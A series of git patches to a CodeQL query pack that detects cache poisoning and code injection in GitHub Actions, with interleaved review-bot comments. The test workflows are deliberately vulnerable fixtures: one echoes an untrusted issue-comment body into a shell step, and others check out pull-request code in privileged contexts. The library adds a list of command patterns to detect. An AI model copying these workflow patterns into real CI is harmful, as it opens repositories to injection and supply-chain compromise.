diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index bf18df4797d..12be71af43e 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -16,8 +16,10 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps -from LocalJob j, PRHeadCheckoutStep checkout +from LocalJob j, PRHeadCheckoutStep checkout, Step s where + // Excluding privileged workflows since they can be easily exploited in similar circumstances + not j.isPrivileged() and // The workflow runs in the context of the default branch // TODO: (require to collect trigger types) // - add push to default branch? @@ -37,10 +39,13 @@ where ( // The job writes to the cache // (No need to follow the checkout step as the cache writing is normally done after the job completes) - j.getAStep() instanceof CacheWritingStep + j.getAStep() = s and + s instanceof CacheWritingStep or // The job executes checked-out code // (The cache specific token can be leaked even for non-privileged workflows) - checkout.getAFollowingStep() instanceof PoisonableStep + checkout.getAFollowingStep() = s and + s instanceof PoisonableStep ) -select checkout, "Potential cache poisoning on privileged workflow." +select checkout, "Untrusted checked-out code may lead to cache poisoning on step $@.", s, + s.toString() From d2e9411e129380691ebacb645a1fbd74bea3c572 Mon Sep 17 00:00:00 2001 
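Review bot: The comment above `not j.isPrivileged()` speaks of privileged workflows, but the predicate is now evaluated per job, and the comment does not say where the excluded jobs are reported instead. A maintainer cannot tell from this query that dropping them is safe. Suggested wording: `// Privileged jobs are out of scope here; an untrusted checkout in a privileged job is expected to be reported by the CWE-829 PrivilegedUntrustedCheckout queries`. Please confirm that every job excluded here is covered there, since those queries carry their own `ControlCheck` exclusions and a job filtered by both would produce no alert at all.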
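Review bot: Binding `s` in both disjuncts makes the result set one row per (checkout, step) pair, so a checkout in a job with several cache-writing or poisonable steps will likely be listed several times with rows that differ only in the link target. The link text is `s.toString()`, which the expected output renders as the generic `Uses Step` / `Run Step`, so the duplicates are hard to tell apart when triaging. If one alert per checkout is intended, select a single representative step; otherwise document in a comment that multiple rows per checkout are expected.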
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:35:17 +0200 Subject: [PATCH 0256/1267] Update and new tests --- .../CWE-349/.github/workflows/test1.yml | 1 + .../CWE-349/.github/workflows/test10.yml | 12 +++++++++ .../CWE-349/.github/workflows/test11.yml | 24 +++++++++++++++++ .../CWE-349/.github/workflows/test12.yml | 21 +++++++++++++++ .../CWE-349/.github/workflows/test2.yml | 2 ++ .../CWE-349/.github/workflows/test3.yml | 2 ++ .../CWE-349/.github/workflows/test4.yml | 4 +++ .../CWE-349/.github/workflows/test5.yml | 2 ++ .../CWE-349/.github/workflows/test6.yml | 1 + .../CWE-349/.github/workflows/test7.yml | 1 + .../CWE-349/.github/workflows/test8.yml | 26 ++++++++++++++++--- .../CWE-349/.github/workflows/test9.yml | 2 +- .../Security/CWE-349/CachePoisoning.expected | 14 +++++----- .../CachePoisoningByCodeInjection.expected | 3 ++- ...ivilegedUntrustedCheckoutCritical.expected | 1 + .../PrivilegedUntrustedCheckoutHigh.expected | 1 - 16 files changed, 104 insertions(+), 13 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test10.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test11.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test12.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml index 75e03886d48..55efe8e9fec 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml @@ -4,6 +4,7 @@ on: jobs: pr-comment: + permissions: read-all runs-on: ubuntu-latest steps: - uses: xt0rted/pull-request-comment-branch@v2 diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test10.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test10.yml new file mode 100644 index 00000000000..eba5e79229b --- /dev/null 
+++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test10.yml @@ -0,0 +1,12 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: write-all + runs-on: ubuntu-latest + steps: + - run: | + echo ${{ github.event.comment.body }} + diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test11.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test11.yml new file mode 100644 index 00000000000..3849d92cbcc --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test11.yml @@ -0,0 +1,24 @@ +on: + issue_comment: + types: [created] + +permissions: write-all + +jobs: + pr-comment: + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test12.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test12.yml new file mode 100644 index 00000000000..e2c435af62d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test12.yml @@ -0,0 +1,21 @@ +on: + issue_comment: + types: [created] + +permissions: + issues: write +jobs: + pr-comment: + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - run: | + ./checkedout/poison + diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml index 6a6595d929e..eb6373a406e 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml 
@@ -2,6 +2,8 @@ name: Cache Poisoning on: pull_request_target +permissions: read-all + jobs: poison: runs-on: ubuntu-latest diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml index 2c684b6a02d..fa56d074936 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml @@ -2,6 +2,8 @@ name: Cache Poisoning on: pull_request_target +permissions: {} + jobs: poison: runs-on: ubuntu-latest diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml index b5ea127ebd3..03eb9e99f0f 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml @@ -2,9 +2,13 @@ name: Cache Poisoning on: pull_request_target +permissions: + contents: read + jobs: poison: runs-on: ubuntu-latest + permissions: read-all steps: - uses: actions/checkout@v3 with: diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml index 9bc6cc98056..b7454d0a0dc 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml @@ -5,6 +5,8 @@ on: pull_request_target jobs: poison: runs-on: ubuntu-latest + permissions: + contents: read steps: - uses: actions/checkout@v3 with: diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml index b5ef835210b..2fa898982bc 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml 
@@ -5,6 +5,7 @@ on: pull_request_target jobs: poison: runs-on: ubuntu-latest + permissions: read-all steps: - uses: actions/checkout@v3 with: diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml index d0ff8c180fe..be83f83cf30 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml @@ -5,6 +5,7 @@ on: pull_request_target jobs: poison: runs-on: ubuntu-latest + permissions: read-all steps: - uses: actions/checkout@v3 with: diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml index 68d3f7f75ac..05f8e4a067a 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml @@ -5,15 +5,33 @@ on: jobs: pr-comment: runs-on: ubuntu-latest + permissions: read-all steps: - uses: xt0rted/pull-request-comment-branch@v2 id: comment-branch - - uses: actions/checkout@v3 - if: success() with: ref: ${{ steps.comment-branch.outputs.head_sha }} + - run: ./checkedout/poison - - run: | - ./checkedout/poison + pr-comment2: + runs-on: ubuntu-latest + permissions: read-all + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + - uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + - uses: ./.github/actions/node-npm-setup + pr-comment3: + runs-on: ubuntu-latest + permissions: read-all + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + - uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + - run: node .github/actions-scripts/what-docs-early-access-branch.js 
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml index 3b646b795ac..9f19634abc9 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml @@ -4,8 +4,8 @@ on: jobs: pr-comment: + permissions: read-all runs-on: ubuntu-latest - permissions: {} steps: - run: | echo ${{ github.event.comment.body }} diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 67cdea32c5d..841a3ee4071 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected 
@@ -1,6 +1,8 @@ -| .github/workflows/test1.yml:12:9:17:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test2.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test3.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test6.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test7.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test8.yml:12:9:17:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test1.yml:13:9:18:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Uses Step | +| .github/workflows/test2.yml:11:9:14:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Uses Step | +| .github/workflows/test3.yml:11:9:14:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Uses Step | +| .github/workflows/test6.yml:10:9:13:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Uses Step | +| .github/workflows/test7.yml:10:9:13:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Uses Step | +| .github/workflows/test8.yml:12:9:15:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test8.yml:15:9:17:2 | Run Step | Run Step | +| .github/workflows/test8.yml:23:9:26:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. 
| .github/workflows/test8.yml:26:9:28:2 | Uses Step | Uses Step | +| .github/workflows/test8.yml:34:9:37:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test8.yml:37:9:37:75 | Run Step | Run Step | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected index 5f244aa2faf..60c25e1cd92 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected @@ -1,6 +1,7 @@ edges nodes | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/test10.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected index ff65e165812..ca86bac14f0 100644 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected 
+++ b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected @@ -1,3 +1,4 @@ +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected index dc5a6bc915f..a40ab1fa771 100644 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected @@ -1,4 +1,3 @@ -j .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 1ea0312f362e90cb43895ae235884cc26f3684a4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:35:25 +0200 Subject: [PATCH 0257/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) 
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index f07d6c40046..e68a4c67cc4 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.21 +version: 0.0.22 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 13f053a40da..465be503e7c 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.21 +version: 0.0.22 groups: - actions - queries From d6fb0ae84ed1dfd7f829fc2f4a4d6228863f05dc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:41:05 +0200 Subject: [PATCH 0258/1267] Update tests --- .../Security/CWE-349/CachePoisoning.expected | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 841a3ee4071..75a370246cb 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected 
@@ -1,8 +1,8 @@ -| .github/workflows/test1.yml:13:9:18:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Uses Step | -| .github/workflows/test2.yml:11:9:14:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Uses Step | -| .github/workflows/test3.yml:11:9:14:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Uses Step | -| .github/workflows/test6.yml:10:9:13:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Uses Step | -| .github/workflows/test7.yml:10:9:13:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Uses Step | -| .github/workflows/test8.yml:12:9:15:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test8.yml:15:9:17:2 | Run Step | Run Step | -| .github/workflows/test8.yml:23:9:26:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Uses Step | -| .github/workflows/test8.yml:34:9:37:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test8.yml:37:9:37:75 | Run Step | Run Step | +| .github/workflows/test1.yml:13:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Uses Step | +| .github/workflows/test2.yml:11:9:14:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. 
| .github/workflows/test2.yml:14:9:18:6 | Uses Step | Uses Step | +| .github/workflows/test3.yml:11:9:14:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Uses Step | +| .github/workflows/test6.yml:10:9:13:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Uses Step | +| .github/workflows/test7.yml:10:9:13:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Uses Step | +| .github/workflows/test8.yml:12:9:15:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:15:9:17:2 | Run Step | Run Step | +| .github/workflows/test8.yml:23:9:26:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Uses Step | +| .github/workflows/test8.yml:34:9:37:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:37:9:37:75 | Run Step | Run Step | From a30c2aa5def74c81e84f2ae8eff890ca8f615e49 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 9 May 2024 23:32:21 +0200 Subject: [PATCH 0259/1267] Update PoisonableSteps --- .../actions/security/PoisonableSteps.qll | 26 ++++++++++++++----- 1 file changed, 19 insertions(+), 7 deletions(-) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index f65bf5fb4dc..070dcbda532 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll 
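Review bot: The expected message changes to "Potential cache poisoning in the context of the default branch on step $@.", but this commit touches only the `.expected` file, while the `select` introduced in CachePoisoning.ql a few commits earlier emits "Untrusted checked-out code may lead to cache poisoning on step $@.". Unless the query text is changed in a commit not shown here, every row of this test now mismatches. Change the `select` message in the same commit as the expected output so that each commit passes on its own.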
@@ -18,8 +18,8 @@ private string dangerousCommands() { [ "npm install", "npm run ", "yarn ", "npm ci(\\b|$)", "make ", "terraform plan", "terraform apply", "gomplate ", "pre-commit run", "pre-commit install", "go generate", - "msbuild ", "mvn ", "./mvnw ", "gradle ", "./gradlew ", "bundle install", "bundle exec ", - "^ant ", "mkdocs build", "pytest" + "msbuild ", "mvn ", "gradle ", "bundle install", "bundle exec ", "^ant ", "mkdocs build", + "pytest", "pip install -r ", "pip install --requirement", "java -jar " ] } @@ -31,21 +31,33 @@ class BuildRunStep extends PoisonableStep, Run { } } +bindingset[cmdRegexp] +string wrapLocalCmd(string cmdRegexp) { result = "(^|;\\s*|\\s+)" + cmdRegexp + "(\\s+|;|$)" } + class LocalCommandExecutionRunStep extends PoisonableStep, Run { string cmd; LocalCommandExecutionRunStep() { // Heuristic: - // Run step with a command starting with `./xxxx`, `sh xxxx`, ... exists(string line | line = this.getScript().splitAt("\n").trim() | // ./xxxx - cmd = line.regexpCapture("(^|\\s+)\\.\\/(.*)", 2) + // TODO: It could also be in the form of `dir/cmd` + cmd = line.regexpCapture(wrapLocalCmd("\\.\\/(.*)"), 2) or // sh xxxx - cmd = line.regexpCapture("(^|\\s+)(ba|z|fi)?sh\\s+(.*)", 3) + cmd = line.regexpCapture(wrapLocalCmd("(ba|z|fi)?sh\\s+(.*)"), 3) or - // node xxxx - cmd = line.regexpCapture("(^|\\s+)(node|python|ruby|go)\\s+(.*)", 3) + // node xxxx.js + cmd = line.regexpCapture(wrapLocalCmd("node\\s+(.*)(\\.js|\\.ts)"), 2) + or + // python xxxx.py + cmd = line.regexpCapture(wrapLocalCmd("python\\s+(.*)\\.py"), 2) + or + // ruby xxxx.rb + cmd = line.regexpCapture(wrapLocalCmd("ruby\\s+(.*)\\.rb"), 2) + or + // go xxxx.go + cmd = line.regexpCapture(wrapLocalCmd("go\\s+(.*)\\.go"), 2) ) } From 4d612044049e206bba6f01c49c9e49937c3b33ac Mon Sep 17 00:00:00 2001 
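Review bot: The new `pip install -r ` and `pip install --requirement` entries cover requirement files only; `pip install .` and `pip install -e .`, which build the checked-out project itself, stay unmatched. The list feeds a heuristic for steps that execute checked-out code, so consider an entry such as `"pip install (-e )?\\."` (assuming the entries are used as regex fragments, as `npm ci(\\b|$)` and `^ant ` suggest). The removal of `./mvnw ` and `./gradlew ` relies on `LocalCommandExecutionRunStep` catching every `./` invocation; a comment saying so would keep the two lists in sync. The body of `dangerousCommands` starts outside the hunk.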
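Review bot: The suffix `(\\s+|;|$)` added by `wrapLocalCmd` narrows the interpreter patterns more than the comments suggest: `regexpCapture` only yields a result when the whole receiver matches, so a line with anything after the script name (constructed example: `python build.py --flag`) no longer matches, whereas the removed `(node|python|ruby|go)\\s+(.*)` consumed the rest of the line. For the same reason the `;\\s*` and `\\s+` prefix alternatives look unreachable on a trimmed line. If trailing arguments should still count, let the suffix absorb them, e.g. `"(\\s+.*|;.*|$)"`, which keeps the capture-group indices used below, and add a test workflow that passes arguments to the script. `LocalCommandExecutionRunStep` continues outside the hunk.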
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 10 May 2024 14:12:25 +0200 Subject: [PATCH 0260/1267] New tests --- ql/test/library-tests/test.expected | 14 ++++++++++++ .../CWE-349/.github/workflows/test13.yml | 22 +++++++++++++++++++ .../CWE-349/.github/workflows/test14.yml | 22 +++++++++++++++++++ .../CWE-349/.github/workflows/test15.yml | 22 +++++++++++++++++++ .../CWE-349/.github/workflows/test16.yml | 22 +++++++++++++++++++ .../Security/CWE-349/CachePoisoning.expected | 2 ++ 6 files changed, 104 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test13.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test14.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test15.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test16.yml diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index c735596ae05..61f7120e78e 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
@@ -98,6 +98,10 @@ runStepChildren | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | parentNodes | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | 
@@ -136,8 +140,14 @@ parentNodes | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline.yml:2:3:2:14 | workflow_run | .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | .github/workflows/multiline.yml:1:1:33:14 | on: | | .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:2:3:2:14 | workflow_run | +| .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | | .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:2:3:2:14 | workflow_run | +| .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:1:1:33:14 | on: | | .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:1:1:33:14 | on: | | .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | 
@@ -163,6 +173,10 @@ parentNodes | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:33:14 | Run Step | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test13.yml 